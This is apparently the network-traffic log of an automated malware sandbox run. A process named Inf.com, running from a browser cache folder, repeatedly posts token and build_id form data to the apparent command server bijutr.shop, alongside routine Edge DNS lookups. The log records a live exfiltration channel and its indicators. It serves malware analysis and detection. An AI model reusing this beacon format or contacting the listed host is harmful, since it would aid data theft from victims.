                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:01:07 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:01:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49839 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:07 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----WT0R1DJWBSJM7YUKX47G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:01:07 UTC | 16355 | OUT | Data Ascii:
------WT0R1DJWBSJM7YUKX47G
Content-Disposition: form-data; name="token"

a9d26c542187b1bd8ffa28120f0b3b8a
------WT0R1DJWBSJM7YUKX47G
Content-Disposition: form-data; name="build_id"

7860569445207f1198f3127a2e0d4a29
------WT0R1DJWBSJM7YUKX47G
Cont
2024-12-27 06:01:08 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:01:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:01:08 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49845 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:09 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----S2VA1NO8GLNYMY58GL6F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:01:09 UTC | 16355 | OUT | Data Ascii:
------S2VA1NO8GLNYMY58GL6F
Content-Disposition: form-data; name="token"

a9d26c542187b1bd8ffa28120f0b3b8a
------S2VA1NO8GLNYMY58GL6F
Content-Disposition: form-data; name="build_id"

7860569445207f1198f3127a2e0d4a29
------S2VA1NO8GLNYMY58GL6F
Cont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:09 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:01:11 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:11 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:01:11 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49847 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:10 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----WL68Q90R9H47QI5FKFUK
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 493
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:10 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 38 51 39 30 52 39 48 34 37 51 49 35 46 4b 46 55 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------WL68Q90R9H47QI5FKFUKContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------WL68Q90R9H47QI5FKFUKContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------WL68Q90R9H47QI5FKFUKCont
2024-12-27 06:01:11 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:11 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:01:11 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49921 | 172.64.41.3 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:29 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-27 06:01:30 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f8718ac6a294372-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 26 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom&A)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49923 | 172.64.41.3 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:29 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-27 06:01:30 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f8718ac7915c32e-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 01 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49922 | 162.159.61.3 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:30 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-27 06:01:30 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f8718acb86d18d0-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f4 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomPC)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49920 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:30 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----UAI5XB1VS0ZUAIEK6PHD
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 3165
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 55 41 49 35 58 42 31 56 53 30 5a 55 41 49 45 4b 36 50 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 55 41 49 35 58 42 31 56 53 30 5a 55 41 49 45 4b 36 50 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 55 41 49 35 58 42 31 56 53 30 5a 55 41 49 45 4b 36 50 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------UAI5XB1VS0ZUAIEK6PHDContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------UAI5XB1VS0ZUAIEK6PHDContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------UAI5XB1VS0ZUAIEK6PHDCont
2024-12-27 06:01:31 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-27 06:01:31 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49912 | 142.250.181.65 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:30 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-27 06:01:31 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC7tH5ZzJMfNfa9BIZr8250lXMXmPl3ep-Vo_9n3cA_0tj0h-vy5u0X0e4GXYF7rzyXp
                                                                                                                                                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                                  Expires: Fri, 26 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                  Age: 50596
                                                                                                                                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
